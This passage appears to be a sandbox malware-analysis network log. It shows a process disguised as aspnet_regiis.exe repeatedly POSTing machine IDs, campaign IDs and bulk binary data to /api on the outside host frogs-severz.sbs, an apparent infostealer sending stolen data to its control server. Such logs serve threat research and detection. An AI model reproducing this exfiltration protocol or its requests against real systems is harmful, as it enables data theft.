nw/xDF2m7yWjysy1Q3NI+ajA/uTu4O2i3H+1TxFI9GDRHrYZFa3kd/aPxbdNeEDmpcDz4q6opa3DM+MBJHPCQ58O8AlRq+wzosiE8QpxXLTzktXmtLTvi88/6h8gYINc3xi4B1nqsHeqxM62SX9A+avb8uymo6W3xTX/CzN6zEmVCfQPWa76PO6BhLhSNhy0i9nrxry87bqKJq0IOjubA5gN+QFfrOMyo8/BtU16RPSo1Pvopqahqccy6Askacd
2024-11-23 14:21:59 UTC	1369	IN	Data Raw: 41 30 56 35 4b 67 77 74 6f 2b 63 2f 32 31 73 53 66 4b 38 77 38 6a 69 72 76 2f 74 75 6f 6f 6d 72 51 67 36 4f 35 73 44 6e 41 33 79 44 56 43 75 34 44 43 74 7a 73 69 37 52 33 74 41 2f 61 2f 58 37 2f 65 6f 6f 4b 32 71 79 6a 44 68 48 54 68 2b 77 30 2f 52 54 37 67 48 54 65 71 77 64 35 2f 59 78 50 39 56 4f 46 32 30 72 4e 36 39 76 65 36 68 6f 4c 66 49 4d 4f 30 4f 4e 58 2f 49 52 4a 63 48 2b 51 4e 51 71 65 30 78 72 38 2f 49 74 55 31 2b 54 76 71 6d 31 50 6e 6a 71 4f 37 6a 35 63 4d 6e 72 56 64 32 53 63 35 4e 6d 41 4c 2b 44 55 4f 43 32 58 65 78 67 64 33 2f 54 58 6f 45 72 4f 76 57 39 75 32 69 71 36 57 67 78 54 66 6e 42 7a 6c 30 30 55 4b 65 43 50 38 4c 57 4b 58 6d 4d 71 44 64 77 37 52 42 66 6b 33 36 72 5a 4b 7a 70 61 6d 32 37 66 32 45 43 65 34 42 50 57 72 4d 51 4a 31 42 Data Ascii: A0V5Kgwto+c/21sSfK8w8jirv/tuoomrQg6O5sDnA3yDVCu4DCtzsi7R3tA/a/X7/eooK2qyjDhHTh+w0/RT7gHTeqwd5/YxP9VOF20rN69ve6hoLfIMO0ONX/IRJcH+QNQqe0xr8/ItU1+Tvqm1PnjqO7j5cMnrVd2Sc5NmAL+DUOC2Xexgd3/TXoErOvW9u2iq6WgxTfnBzl00UKeCP8LWKXmMqDdw7RBfk36rZKzpam27f2ECe4BPWrMQJ1B
2024-11-23 14:21:59 UTC	1369	IN	Data Raw: 53 6f 4d 4c 61 50 6e 50 39 37 59 45 50 7a 70 4a 44 55 34 72 57 76 70 36 62 50 4d 36 30 51 65 47 4b 44 52 4a 31 42 6f 45 42 59 70 75 55 7a 76 4d 50 45 76 30 4e 78 54 75 61 6b 33 66 44 6d 72 71 75 2f 70 4e 59 77 35 67 6f 31 66 38 78 4d 6e 51 6e 79 51 42 76 71 37 79 2f 75 6c 34 53 54 53 57 64 4f 74 6f 7a 49 36 2b 4b 69 76 36 61 6f 79 48 2f 79 51 53 38 37 78 45 2f 52 57 62 67 41 56 4b 66 36 4d 71 2f 46 7a 72 4a 43 65 55 48 78 70 4e 62 35 37 71 43 38 6f 36 72 45 4f 65 59 4f 4d 33 6a 49 53 5a 38 49 36 6b 41 62 36 75 38 76 37 70 65 45 6c 56 46 33 53 66 6a 70 2f 50 62 7a 71 65 79 4d 71 38 38 34 34 52 6c 32 5a 49 31 61 30 51 62 30 51 41 33 71 34 54 6d 69 7a 4d 4f 33 51 6e 4e 45 2f 36 76 64 39 2b 75 70 76 4b 65 70 7a 69 33 69 44 44 74 2f 7a 6b 6d 55 43 4f 6f 46 58 Data Ascii: SoMLaPnP97YEPzpJDU4rWvp6bPM60QeGKDRJ1BoEBYpuUzvMPEv0NxTuak3fDmrqu/pNYw5go1f8xMnQnyQBvq7y/ul4STSWdOtozI6+Kiv6aoyH/yQS87xE/RWbgAVKf6Mq/FzrJCeUHxpNb57qC8o6rEOeYOM3jISZ8I6kAb6u8v7peElVF3Sfjp/PbzqeyMq8844Rl2ZI1a0Qb0QA3q4TmizMO3QnNE/6vd9+upvKepzi3iDDt/zkmUCOoFX
2024-11-23 14:21:59 UTC	1369	IN	Data Raw: 75 79 38 69 38 54 58 68 4c 2b 61 54 56 39 75 71 6b 6f 4c 2b 71 77 54 66 68 42 7a 74 70 79 55 6d 44 43 50 45 4e 57 36 4c 36 4e 4f 36 42 68 4c 68 53 4e 68 79 30 6d 64 6a 2b 36 62 69 6a 6f 75 58 62 63 66 52 50 4d 58 65 44 47 39 45 54 36 67 42 65 71 75 38 35 76 4d 37 4d 73 45 42 32 51 76 2b 68 30 66 54 68 6f 4b 65 72 70 4d 6b 2b 37 41 38 7a 65 38 70 52 6e 45 47 32 51 46 4b 79 71 47 2f 75 2b 4d 69 30 65 33 56 53 74 4c 53 63 35 4b 57 70 6f 75 33 39 68 44 37 2f 41 6a 35 2f 77 30 36 58 43 76 6b 42 56 71 72 6f 4e 4b 37 4b 7a 37 42 4d 63 55 6e 2b 6f 74 76 76 37 61 71 38 72 61 6e 41 66 36 4e 50 4d 57 4f 44 47 39 45 78 2b 77 74 5a 71 75 55 69 37 74 43 4b 70 67 70 78 53 4c 54 7a 6b 76 58 75 70 61 69 6d 70 73 63 78 35 67 55 35 64 4d 6c 46 6c 77 6e 39 41 46 6d 71 37 54 Data Ascii: uy8i8TXhL+aTV9uqkoL+qwTfhBztpyUmDCPENW6L6NO6BhLhSNhy0mdj+6bijouXbcfRPMXeDG9ET6gBequ85vM7MsEB2Qv+h0fThoKerpMk+7A8ze8pRnEG2QFKyqG/u+Mi0e3VStLSc5KWpou39hD7/Aj5/w06XCvkBVqroNK7Kz7BMcUn+otvv7aq8ranAf6NPMWODG9Ex+wtZquUi7tCKpgpxSLTzkvXupaimpscx5gU5dMlFlwn9AFmq7T
2024-11-23 14:21:59 UTC	1369	IN	Data Raw: 75 41 6f 34 42 50 4c 72 69 71 32 72 37 71 71 38 35 5a 78 76 76 31 52 6a 4b 4a 51 54 77 78 36 32 47 52 57 38 71 47 2f 38 67 59 53 74 43 69 34 45 73 36 6a 41 37 2b 4f 74 75 4b 37 69 2b 67 48 4e 42 44 70 34 7a 30 4b 57 51 62 5a 41 57 75 71 77 44 75 37 4d 31 71 30 46 5a 31 4c 35 75 39 57 78 37 62 2b 6a 6f 65 57 4b 66 36 45 4c 50 58 66 47 52 49 46 4f 36 68 42 65 70 76 35 37 71 74 32 45 38 51 70 6e 54 2f 75 35 33 50 71 71 76 37 69 67 74 63 63 36 36 6b 4d 2b 61 73 35 50 30 55 2b 34 46 56 36 6d 37 6a 71 37 67 4e 57 70 53 57 42 44 75 4b 50 44 38 4f 6e 75 6b 65 50 6c 33 48 2b 31 54 77 4e 34 7a 55 32 57 46 2b 6c 4e 64 61 48 6b 4e 4b 4c 4f 77 2f 38 45 4e 6b 4b 30 38 34 47 7a 70 61 71 2f 37 66 32 55 62 62 5a 61 5a 53 79 54 45 59 35 50 34 55 42 44 36 72 42 6c 34 49 2f Data Ascii: uAo4BPLriq2r7qq85Zxvv1RjKJQTwx62GRW8qG/8gYStCi4Es6jA7+OtuK7i+gHNBDp4z0KWQbZAWuqwDu7M1q0FZ1L5u9Wx7b+joeWKf6ELPXfGRIFO6hBepv57qt2E8QpnT/u53Pqqv7igtcc66kM+as5P0U+4FV6m7jq7gNWpSWBDuKPD8OnukePl3H+1TwN4zU2WF+lNdaHkNKLOw/8ENkK084Gzpaq/7f2UbbZaZSyTEY5P4UBD6rBl4I/
2024-11-23 14:21:59 UTC	1369	IN	Data Raw: 67 53 7a 70 64 2f 38 35 71 43 74 76 37 66 43 50 50 73 4d 63 55 58 39 5a 70 77 4d 2f 51 35 53 6c 4e 59 57 70 4e 2f 4a 73 45 31 49 65 73 4f 36 31 65 32 6e 69 4b 32 37 70 6f 52 78 72 52 64 32 49 34 4e 69 6d 78 48 31 44 31 4c 71 70 6e 65 71 6a 35 7a 2f 62 33 74 4a 38 61 58 56 76 38 53 6b 76 71 43 71 77 33 2b 6a 54 7a 6f 37 6d 77 4f 51 43 2b 67 4e 57 71 32 6b 4d 4c 54 49 68 50 45 4b 65 41 53 73 36 39 50 33 39 61 4f 68 71 75 6e 43 4d 65 4e 50 4b 54 58 61 41 34 64 42 6f 46 4d 62 36 76 70 33 39 6f 2b 44 73 55 64 33 52 2f 71 6f 77 4f 2f 6a 72 62 69 75 34 76 6f 42 79 41 49 37 66 73 31 45 72 7a 2f 5a 43 6b 57 6e 35 7a 44 73 37 38 4f 70 53 55 68 36 77 37 72 56 37 61 65 49 72 62 75 6d 68 48 47 74 46 33 59 6a 67 32 4b 62 45 66 55 50 55 75 6a 49 4d 4c 6a 4d 68 50 45 4b Data Ascii: gSzpd/85qCtv7fCPPsMcUX9ZpwM/Q5SlNYWpN/JsE1IesO61e2niK27poRxrRd2I4NimxH1D1Lqpneqj5z/b3tJ8aXVv8SkvqCqw3+jTzo7mwOQC+gNWq2kMLTIhPEKeASs69P39aOhqunCMeNPKTXaA4dBoFMb6vp39o+DsUd3R/qowO/jrbiu4voByAI7fs1Erz/ZCkWn5zDs78OpSUh6w7rV7aeIrbumhHGtF3Yjg2KbEfUPUujIMLjMhPEK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49708	172.67.155.47	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:22:01 UTC	280	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=54TU150KE0PVRYIQ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12830 Host: frogs-severz.sbs
2024-11-23 14:22:01 UTC	12830	OUT	Data Raw: 2d 2d 35 34 54 55 31 35 30 4b 45 30 50 56 52 59 49 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 46 41 37 42 33 39 31 42 45 39 34 44 44 34 42 45 38 38 39 35 46 44 42 45 34 31 39 36 39 44 0d 0a 2d 2d 35 34 54 55 31 35 30 4b 45 30 50 56 52 59 49 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 34 54 55 31 35 30 4b 45 30 50 56 52 59 49 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6a 71 6d 69 72 63 6d 7a 71 70 67 Data Ascii: --54TU150KE0PVRYIQContent-Disposition: form-data; name="hwid"BDFA7B391BE94DD4BE8895FDBE41969D--54TU150KE0PVRYIQContent-Disposition: form-data; name="pid"2--54TU150KE0PVRYIQContent-Disposition: form-data; name="lid"LPnhqo--jqmircmzqpg
2024-11-23 14:22:02 UTC	1004	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:22:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ccclbs10v12gkr80vd3uepgom0; expires=Wed, 19-Mar-2025 08:08:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4OsUNrGOk77tsfIfYWjxe4V0QjfKTmnNj1cd8lHHzGMUdu4FmJ8tMu7zZMi4LCCk9mCcRL8f8PXpcqfQ4VGHeaPg4bHhSmbvBBSdtdZDrO04i3ZXUCxfux5cbrskuyJddTIo"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71cf1b3df10f71-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1497&sent=8&recv=18&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13768&delivery_rate=1813664&cwnd=250&unsent_bytes=0&cid=9d434b2abc917106&ts=762&x=0"
2024-11-23 14:22:02 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 14:22:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49712	172.67.155.47	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:22:03 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=E5O0FK1MFJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15036 Host: frogs-severz.sbs
2024-11-23 14:22:03 UTC	15036	OUT	Data Raw: 2d 2d 45 35 4f 30 46 4b 31 4d 46 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 46 41 37 42 33 39 31 42 45 39 34 44 44 34 42 45 38 38 39 35 46 44 42 45 34 31 39 36 39 44 0d 0a 2d 2d 45 35 4f 30 46 4b 31 4d 46 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 35 4f 30 46 4b 31 4d 46 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6a 71 6d 69 72 63 6d 7a 71 70 67 66 0d 0a 2d 2d 45 35 4f 30 46 4b 31 4d 46 4a 0d 0a 43 Data Ascii: --E5O0FK1MFJContent-Disposition: form-data; name="hwid"BDFA7B391BE94DD4BE8895FDBE41969D--E5O0FK1MFJContent-Disposition: form-data; name="pid"2--E5O0FK1MFJContent-Disposition: form-data; name="lid"LPnhqo--jqmircmzqpgf--E5O0FK1MFJC
2024-11-23 14:22:04 UTC	1021	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:22:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t0mc8sk92r42gqoijr6s6j9f5r; expires=Wed, 19-Mar-2025 08:08:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qDRcLum9YkgJMnsXXUFgHXiW0zu%2B7qDisCZak2zEaMD%2BHlrR%2BhkEdhSMaLOYInA5JP4mnrabTBceynGoY%2F1vH02LCIC5Rf8Hw%2BjuyM4h1xkOnBnCsGat9%2FR3KFI%2FiCwbtS%2Fq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71cf28ac458c6c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2035&sent=12&recv=20&lost=0&retrans=0&sent_bytes=2838&recv_bytes=15968&delivery_rate=1407228&cwnd=168&unsent_bytes=0&cid=5f37e3074c071442&ts=782&x=0"
2024-11-23 14:22:04 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 14:22:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49714	172.67.155.47	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:22:05 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=XEPT2EPSN48ZUU9RJ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20568 Host: frogs-severz.sbs
2024-11-23 14:22:05 UTC	15331	OUT	Data Raw: 2d 2d 58 45 50 54 32 45 50 53 4e 34 38 5a 55 55 39 52 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 46 41 37 42 33 39 31 42 45 39 34 44 44 34 42 45 38 38 39 35 46 44 42 45 34 31 39 36 39 44 0d 0a 2d 2d 58 45 50 54 32 45 50 53 4e 34 38 5a 55 55 39 52 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 58 45 50 54 32 45 50 53 4e 34 38 5a 55 55 39 52 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6a 71 6d 69 72 63 6d 7a Data Ascii: --XEPT2EPSN48ZUU9RJContent-Disposition: form-data; name="hwid"BDFA7B391BE94DD4BE8895FDBE41969D--XEPT2EPSN48ZUU9RJContent-Disposition: form-data; name="pid"3--XEPT2EPSN48ZUU9RJContent-Disposition: form-data; name="lid"LPnhqo--jqmircmz
2024-11-23 14:22:05 UTC	5237	OUT	Data Raw: af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 56vMMZh'F3Wun 4F([:7s~X`nO
2024-11-23 14:22:06 UTC	1009	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:22:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nla2gmaaue3q997aln5o57jvci; expires=Wed, 19-Mar-2025 08:08:45 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BzCPwkodxL8gQoJSZUMivNgF7IwMwxq1jHiKtNJ%2FtfwRcEA6f6u5sMxBuYAVTq0JKw5vk5qNuEdHsYkj576Pk7P6du3xY8SshTvLfPWI3BlQncJcdWkBGV0PQMCNmJ%2F5sIpX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71cf3608bf4321-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1788&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21529&delivery_rate=1467336&cwnd=247&unsent_bytes=0&cid=13c103433902c62f&ts=900&x=0"
2024-11-23 14:22:06 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 14:22:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49716	172.67.155.47	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:22:08 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4YLONCHJDY User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1241 Host: frogs-severz.sbs
2024-11-23 14:22:08 UTC	1241	OUT	Data Raw: 2d 2d 34 59 4c 4f 4e 43 48 4a 44 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 46 41 37 42 33 39 31 42 45 39 34 44 44 34 42 45 38 38 39 35 46 44 42 45 34 31 39 36 39 44 0d 0a 2d 2d 34 59 4c 4f 4e 43 48 4a 44 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 34 59 4c 4f 4e 43 48 4a 44 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6a 71 6d 69 72 63 6d 7a 71 70 67 66 0d 0a 2d 2d 34 59 4c 4f 4e 43 48 4a 44 59 0d 0a 43 Data Ascii: --4YLONCHJDYContent-Disposition: form-data; name="hwid"BDFA7B391BE94DD4BE8895FDBE41969D--4YLONCHJDYContent-Disposition: form-data; name="pid"1--4YLONCHJDYContent-Disposition: form-data; name="lid"LPnhqo--jqmircmzqpgf--4YLONCHJDYC
2024-11-23 14:22:08 UTC	1004	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 14:22:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6q41vbo8um82uh9mmukl7m8mt3; expires=Wed, 19-Mar-2025 08:08:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PO5eLV78pDyI7hXiCVyCIXegYT3zXFRyy43W9I2Z9TORnQixMBAfIC74lbyaScz8FIMTgtBGTQ7DPIODoekqUOH3rjcvFQ2lXUpMFzWp%2FWzx6yDK5KFr6gQHN5ZmVfIScGYj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e71cf45cb5378e2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1984&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2150&delivery_rate=1457085&cwnd=247&unsent_bytes=0&cid=ca56e0c3e48b2bd1&ts=785&x=0"
2024-11-23 14:22:08 UTC	19	IN	Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a Data Ascii: eok 8.46.123.75
2024-11-23 14:22:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49717	172.67.155.47	443	2380	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 14:22:10 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=XGTBCI5SBOJ8N User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 589595 Host: frogs-severz.sbs
2024-11-23 14:22:10 UTC	15331	OUT	Data Raw: 2d 2d 58 47 54 42 43 49 35 53 42 4f 4a 38 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 44 46 41 37 42 33 39 31 42 45 39 34 44 44 34 42 45 38 38 39 35 46 44 42 45 34 31 39 36 39 44 0d 0a 2d 2d 58 47 54 42 43 49 35 53 42 4f 4a 38 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 47 54 42 43 49 35 53 42 4f 4a 38 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 6a 71 6d 69 72 63 6d 7a 71 70 67 66 0d 0a 2d 2d 58 47 54 42 Data Ascii: --XGTBCI5SBOJ8NContent-Disposition: form-data; name="hwid"BDFA7B391BE94DD4BE8895FDBE41969D--XGTBCI5SBOJ8NContent-Disposition: form-data; name="pid"1--XGTBCI5SBOJ8NContent-Disposition: form-data; name="lid"LPnhqo--jqmircmzqpgf--XGTB
2024-11-23 14:22:10 UTC	15331	OUT	Data Raw: e9 54 5e 60 b2 d0 07 c8 8d 86 c6 06 31 61 d2 5b af 77 84 76 fa 0f 0e 5f 00 81 1d c3 8b 48 9a 85 64 be b7 35 21 6c 60 5e 3c a0 e9 af c2 9a a0 23 63 f7 2c eb d6 9e 3e 67 b6 ff 53 7d ae 5e 71 fd 54 74 c5 34 60 fc 73 1b e0 98 63 47 6c f6 4e df 3d c7 04 8c a2 c3 92 74 ac e5 be a3 5c 7c ce 70 67 0a 03 3a 01 02 dd 52 5e 18 90 14 40 75 d2 7d e1 8c a4 a5 0e 82 a2 e9 7f b4 3c ff d9 69 47 92 fd 76 a0 de ef 8f d8 5a bf e5 9f 5a 0c 75 0f d0 5f 6d 5f 97 07 18 af 14 89 40 72 dc 4a 39 44 e7 9a a8 10 5e 44 9f 38 37 72 c4 0d 77 41 c4 42 6e e7 13 00 35 48 d0 ba 27 57 fb 28 66 8b 77 23 a9 7e f2 a3 e1 11 e8 d0 c5 26 e0 75 5d 81 3f 0f 0b 26 ed 5c 2e 7a d5 ff 01 6e 5a 90 fd f5 96 47 b9 e0 0c c4 89 e0 11 34 45 5c ae 06 18 df 54 da b4 c6 e9 e8 d4 61 71 71 97 e9 79 7f 2b f9 a1 6e Data Ascii: T^`1a[wv_Hd5!l`^<#c,>gS}^qTt4`scGlN=t\\|pg:R^@u}<iGvZZu_m_@rJ9D^D87rwABn5H'W(fw#~&u]?&\.znZG4E\Taqqy+n
